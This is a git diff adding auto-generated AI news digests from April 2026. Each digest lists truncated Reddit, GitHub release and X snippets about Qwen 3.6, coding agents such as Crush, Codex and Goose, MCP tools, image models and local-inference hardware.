(@andreynering) ### Fixed * f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm + +--- + +## [Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?](https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: api_update + +> Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself. It’s ok on basic apps, but really struggles to move ahead on something more complex like + +--- + +## [PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.](https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: tool_update + +> I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful. Qwen 3.6 now addresses this with a new preserve\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B) >`please use "preserve_thinking": True instead of "chat_template_kwargs": {"preserve_thinking + +--- + +## [Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.](https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: open_source + +> Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this Google if you seeing this (prob. not) please open source it in I/O 2026 Edit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it + +--- + +## [Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings](https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: agent_tool + +> Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text. The idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins + +--- + diff --git a/data/digest-2026-04-17.md b/data/digest-2026-04-17.md new file mode 100644 index 0000000..b4320b3 --- /dev/null +++ b/data/digest-2026-04-17.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-17** | 15 stories | Auto-generated from 370 archived stories + +--- + +## [Crush v0.60.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.60.0) +*GitHub Releases · Crush* | 17/04/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> # Secret release You're not supposed to read through the changelog below. ## Changelog ### New! * ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering) ---
Verifying the artifacts First, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/ + +--- + +## [Adapt: open-source memory that rewrites its own structure when your data surprises it](https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. Works with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. Observe and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s + +--- + +## [Anthropic's AI protocol has critical flaw affecting 200,000 servers](https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/) +*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/ Security researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more + +--- + +## [OpenAI Codex Just Got Its Biggest Update Yet](https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/) +*Reddit r/ChatGPT* | 17/04/2026 | Score: 1.00 +Tags: developer_tool, cli_tool, agent_tool + +> OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. Recent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. April 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and + +--- + +## [[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client](https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork. Web Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/) **MooshieUI Integration (Open Source)** For those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, + +--- + +## [How to Implement Karpathy's LLM Knowledge Base. Full Guide](https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/) +*Reddit r/ChatGPT* | 17/04/2026 | Score: 0.98 +Tags: api_update, developer_tool + +> karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup. **the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes + +--- + +## [Gemini CLI v0.38.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2) +*GitHub Releases · Gemini CLI* | 17/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2 + +--- + +## [Vercel CLI vercel@51.7.0 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0) +*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 +Tags: api_update, cli_tool + +> ### Minor Changes - [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895)) - Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893)) - [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920)) ### Patch Changes - Include `action` and `resource` fields from API 403 responses in non- + +--- + +## [Vercel CLI vercel@51.6.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1) +*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ### Patch Changes - Updated dependencies \[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]: - @vercel/build-utils@13.18.0 - @vercel/backends@0.1.0 - @vercel/python@6.34.0 - @vercel/elysia@0.1.68 - @vercel/express@0.1.78 - @vercel/fastify@0.1.71 - @vercel/go@3.5.0 - @vercel/h3@0.1.77 - @vercel/hono@0.2.71 - @vercel/hydrogen@1.3.6 - @vercel/koa@0.1.51 + +--- + +## [CadQuery is an open-source Python library for building 3D CAD models](https://cadquery.github.io/) +*Hacker News* | 15/04/2026 | Score: 0.84 +Tags: open_source, developer_tool + +--- + +## [Qwen3.6 GGUF is so good for debugging.](https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\_0 kv cache (context window) + +--- + +## [Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review](https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/) +*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 +Tags: open_source + +> The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70. + +--- + +## [Trying to Run LTX2.3 locally but getting an error](https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h + +--- + +## [Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time](https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/) +*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 +Tags: tool_update + +> I genuinely cannot believe what I'm watching unfold today Anthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it And the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal + +--- + +## [Fastest image to image model](https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/) +*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 +Tags: api_update + +> Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more. + +--- + diff --git a/data/digest-2026-04-18.md b/data/digest-2026-04-18.md new file mode 100644 index 0000000..9c2b33f --- /dev/null +++ b/data/digest-2026-04-18.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-18** | 15 stories | Auto-generated from 256 archived stories + +--- + +## [[Update] GHOST v2.1: Full Native Windows Support is Live.](https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> FOR THE UNINITIATED: GHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required. KEY FEATURES Full Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer. Auto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture + +--- + +## [easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]](https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d I have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use. Having worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o + +--- + +## [We’re proud to open-source LIDARLearn [R] [D] [P]](https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support. It brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods. You can run everything from a single YAML file with one simple command. One of the best features: after training, you can automatically generate a publica + +--- + +## [Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra](https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix **Hardware:** Apple M3 Ultra, 256GB unified memory **Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK **Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B # The Agent Compatibility Matrix This is the part I wish + +--- + +## [gpt can now control your entire computer like a humain](https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/) +*Reddit r/ChatGPT* | 18/04/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> Hey everyone, I built something called AriaOS and just open-sourced it. The idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment. What made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local + +--- + +## [ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.](https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/) +*Reddit r/ChatGPT* | 18/04/2026 | Score: 0.94 +Tags: mcp, open_source + +> You've probably asked ChatGPT a question about a game you're playing -- "is this item worth keeping in D2R," "why is my Factorio base bottlenecked," "how does this card interaction work in Magic," -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense. I built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess. For example: * * + +--- + +## [Goose v1.31.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.0) +*GitHub Releases · Goose* | 17/04/2026 | Score: 0.76 +Tags: github_release, tool_update + +> New version of Goose available. + +--- + +## [Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!](https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: api_update + +> Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users. Here's my docker compose file: services: vllm: image: vllm/vllm-openai:latest container_name: vllm deploy: resources: reservations: devices: - driver: nvidia count: all capabilities: [gpu] environment: - VLLM_API_KEY + +--- + +## [Are you guys actually using local tool calling or is it a collective prank?](https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: cli_tool + +> I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol Qwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works. Today with Gemma4, it kept assuring me it cr + +--- + +## [Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration](https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Quick update on Lore, the local-first memory app I posted here around v0.1.0. It's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine. v0.2.0 highlights: \- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls in real time. \- Embedding-model migration is now non-destructive. You can swap from nomic-embed to mxbai-embed (or whatever) without losing data; the new embeddingTableSync rebuilds in place + +--- + +## [EditAnything IC-LoRA - LTX-2.3](https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/) +*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 +Tags: tool_update + +> This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints. The current goal is not final polished production quality, but to explore: * edit-anything behavior * prompt-following * inference tradeoffs * synthetic dataset building, especially for **style data** The model was trained around four mai + +--- + +## [Melodic Brotherhood - I Just Need to Know (video generated with open source tools)](https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/) +*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing). Only non-open source thing is the music, which is Suno. + +--- + +## [Has PP improved enough on m5 max to go for 128gb?](https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: agent_tool + +> Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models. Thinking of upgrading to m5 max, just wondering what the sweet spot is for ram? Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding? + +--- + +## [Built a program to track logistical intelligence using satellite data [P]](https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/) +*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 +Tags: tool_update + +> Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts. But there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery. The trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart. Everything stationary looks nor + +--- + +## [Is there something like SETI for training open source models?](https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/) +*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 +Tags: open_source + +> Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think. Would it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea? + +--- + diff --git a/data/digest-2026-04-19.md b/data/digest-2026-04-19.md new file mode 100644 index 0000000..94cf540 --- /dev/null +++ b/data/digest-2026-04-19.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-04-19** | 15 stories | Auto-generated from 579 archived stories + +--- + +## [whats the best harness/app to use my llm with?](https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app looking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model. seeing things like hermes? cherry studio? good ol LM studio? + +--- + +## [I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality](https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> # Sum B+a+c+k+g+r+o+u+n+d: I've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne + +--- + +## [ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.](https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/) +*Reddit r/StableDiffusion* | 19/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference. Output images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA. Prompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl + +--- + +## [How would you describe the Midjourney look and why does it have one?](https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/) +*Reddit r/midjourney* | 19/04/2026 | Score: 0.78 +Tags: github_release, tool_update + +> I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other + +--- + +## [I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design](https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/) +*Reddit r/ClaudeAI* | 19/04/2026 | Score: 0.78 +Tags: cli_tool, tool_update + +> Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry. So I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r + +--- + +## [Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents](https://x.com/BonairoFi/status/2045823726919258175) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale. + +--- + +## [Vercel Got Breached — Roll Your Secrets Right Now](https://x.com/vercel/status/2045865072074035664) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel. + +--- + +## [Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day](https://x.com/AmpereSh/status/2045866315496161601) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week. + +--- + +## [Scoble Reshares Elon Musk's OpenClaw X API Endorsement](https://x.com/Scobleizer/status/2045572824866398399) +*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 +Tags: api_update + +> Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community. + +--- + +## [Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]](https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/) +*Reddit r/MachineLearning* | 19/04/2026 | Score: 1.00 +Tags: developer_tool + +> Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive. If the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a + +--- + +## [RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding](https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> TL;DR: If you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment? I’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB. My job is just needing to fine-tune with sma + +--- + +## [Acceptable prompt processing speed for you?](https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/) +*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 +Tags: agent_tool + +> I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. For agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good? + +--- + +## [Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion](https://www.latent.space/p/notion) +*Latent Space* | Score: 0.98 +Tags: mcp + +--- + +## [Prepay for the Gemini API to get more control over your spend](https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/) +*Google AI Blog* | Score: 0.94 +Tags: api_update + +--- + +## [🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes](https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash) +*Rohan Paul* | Score: 0.90 +Tags: tool_update + +--- + diff --git a/data/digest-2026-04-20.md b/data/digest-2026-04-20.md new file mode 100644 index 0000000..41416ac --- /dev/null +++ b/data/digest-2026-04-20.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-20** | 15 stories | Auto-generated from 503 archived stories + +--- + +## [PowerShell v7.6.0 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0) +*GitHub Releases · PowerShell* | 18/03/2026 | Score: 0.70 +Tags: api_update, developer_tool, cli_tool + +> ## [7.6.0] - 2026-03-12 ### General Cmdlet Updates and Fixes - Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973) ### Tests - Add GitHub Actions annotations for Pester test failures (#26969) - Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888) ### Build and Packaging Improvements

Update to .NET SDK 10.0.201

  • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041) Are MCP servers / AI tools feeling too fragmented right now? I’ve been exploring AI agents and noticed that tools (like MCP servers or similar integrations) are spread across GitHub with no clear way to discover, test, or install them easily. Curious: \- Do you struggle to find reliable tools for your agents? \- How do you currently discover and test them? \- What’s the most annoying part of using these tools right now? Would love to hear real experiences. + +--- + +## [Your MCP tools are wasting 40% of Claude's context on JSON field names](https://reddit.com/r/ClaudeAI/comments/1sqfk3f/your_mcp_tools_are_wasting_40_of_claudes_context/) +*Reddit r/ClaudeAI* | 20/04/2026 | Score: 1.00 +Tags: api_update, mcp + +> Every time an MCP tool returns data, a database query, API response, search result, it lands verbatim in Claudes context. That means `transactionId`, `orderStatus`, `repositoryDescription` repeated thousands of times across a session. Pure structural noise eating into the space Claude needs to actually think. I built [compressmcp](https://github.com/TheDecipherist/compressmcp) to fix this. It hooks into Claude Code's PostToolUse pipeline, compresses JSON keys using a shared dictionary, and inje + +--- + +## [Scoble: OpenClaw and similar tools are very similar — comparing AI agent frameworks](https://x.com/Scobleizer/status/2045981445479710871) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Scoble observes that OpenClaw and similar AI agent tools are converging on similar designs, reflecting the maturation of the AI agent framework space. + +--- + +## [Vercel CLI @vercel/node@5.7.12 released](https://github.com/vercel/vercel/releases/tag/%40vercel/node%405.7.12) +*GitHub Releases · Vercel CLI* | 20/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ### Patch Changes - Updated dependencies \[[`c1866cf1add2107f91cae8292e38e4854bfe0aca`](https://github.com/vercel/vercel/commit/c1866cf1add2107f91cae8292e38e4854bfe0aca)]: - @vercel/build-utils@13.19.1 + +--- + +## [Goose v1.31.1 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.1) +*GitHub Releases · Goose* | 20/04/2026 | Score: 0.76 +Tags: github_release, tool_update + +> New version of Goose available. + +--- + +## [I built a native macOS GUI for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sqicze/i_built_a_native_macos_gui_for_claude_code/) +*Reddit r/ClaudeAI* | 20/04/2026 | Score: 0.62 +Tags: open_source, cli_tool + +> https://preview.redd.it/l9sgqnfgsawg1.png?width=3572&format=png&auto=webp&s=8dc26a4e89526137b919f82acff985a7a4c1c25b 